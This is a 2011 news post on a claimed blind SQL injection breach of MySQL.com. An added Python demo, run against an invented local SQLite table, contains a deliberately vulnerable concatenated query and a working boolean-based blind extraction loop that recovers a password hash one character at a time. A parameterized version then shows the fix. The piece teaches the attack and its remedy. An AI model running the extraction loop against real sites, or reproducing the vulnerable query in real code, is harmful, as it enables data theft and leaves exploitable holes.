
MySQL.com Compromised

Posted 27 Mar 2011

An email to the Full Disclosure mailing list claims that the main MySQL.com website is vulnerable to blind SQL injection. The email, from Jack Haxor, contained database and table listings, password hashes, and other data said to have been pulled from the site's backend.

In a blind SQL injection attack the attacker still manipulates the data that ends up inside a SQL query, but has to work by trial and error rather than from error messages, because the site masks SQL errors behind a generic page. The only signal left is the difference between a "true" and a "false" response (or, in time-based variants, how long the response takes), and the attacker extracts data one yes/no question at a time, typically one character per question. A SQL injection succeeds when user input is able to change the structure of the query so that it returns data the page was never meant to expose. The root cause is that the application builds its SQL by concatenating user-supplied strings instead of binding them as parameters; input validation (for example, restricting a username field to alphanumeric characters) is a useful second layer, but on its own it is not a fix.
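The following is an added example, not code from the original post or from MySQL.com, that shows both halves of the paragraph above: a lookup that concatenates user input into its query and returns only a generic match/no-match result, a boolean-based blind extraction loop that recovers a stored hash from it one character at a time, and the same lookup rewritten with a bound parameter, against which the identical payloads recover nothing. The in-memory SQLite database, the `users` table, the `admin` account and its hash are all constructed for the example; nothing here is data from the Full Disclosure email.

```python
import sqlite3

# Constructed stand-in for the attacked site's backend. The table, user and
# hash are invented for this example and are not data from the disclosure.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pwhash TEXT)")
conn.execute(
    "INSERT INTO users (username, pwhash) VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99')"
)
conn.commit()


def vulnerable_lookup(username: str) -> bool:
    """Builds the query by string concatenation: the classic injection bug.

    Returns only whether a row matched, i.e. the generic yes/no page of a
    blind scenario. SQL errors are swallowed, so no error text ever reaches
    the caller, but the true/false difference still leaks.
    """
    sql = "SELECT id FROM users WHERE username = '" + username + "'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # error page masked as a generic "not found"


def hardened_lookup(username: str) -> bool:
    """Same query with a bound parameter: the input is data, never SQL."""
    row = conn.execute("SELECT id FROM users WHERE username = ?", (username,)).fetchone()
    return row is not None


def blind_extract_hash(oracle, target_user: str, length: int = 32) -> str:
    """Boolean-based blind extraction against a yes/no oracle.

    For each position, tries every candidate character with a payload of the
    form  admin' AND substr(pwhash,<pos>,1)='<ch>'--  and keeps the one for
    which the oracle answers "true". The hash is assumed to be lowercase hex
    (an MD5-style digest), which fixes the alphabet at 16 candidates.
    """
    alphabet = "0123456789abcdef"
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            payload = f"{target_user}' AND substr(pwhash,{pos},1)='{ch}'-- "
            if oracle(payload):
                recovered += ch
                break
        else:
            # No candidate matched: end of the string, or the injection is
            # not reaching the query (the hardened version lands here at pos 1).
            break
    return recovered


if __name__ == "__main__":
    print("vulnerable:", blind_extract_hash(vulnerable_lookup, "admin"))
    print("hardened:  ", repr(blind_extract_hash(hardened_lookup, "admin")))
```

Against `vulnerable_lookup` the loop recovers the full 32-character hash using at most 16 requests per character, with nothing but a match/no-match page as feedback. Against `hardened_lookup` the same payload is compared as a literal username, no row matches, and the loop stops empty at the first position: the parameter binding, not any filtering of quotes, is what closes the hole.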

An attack of this nature is especially embarrassing for a site whose whole business is a SQL database product. The accessed data appears to include customer and certification data as well as the site's WordPress blog. Oracle acquired MySQL as part of its purchase of Sun Microsystems. At the time of writing there is no announcement or response to the attack on the MySQL.com website. It is unlikely, but this may still turn out to be a hoax.
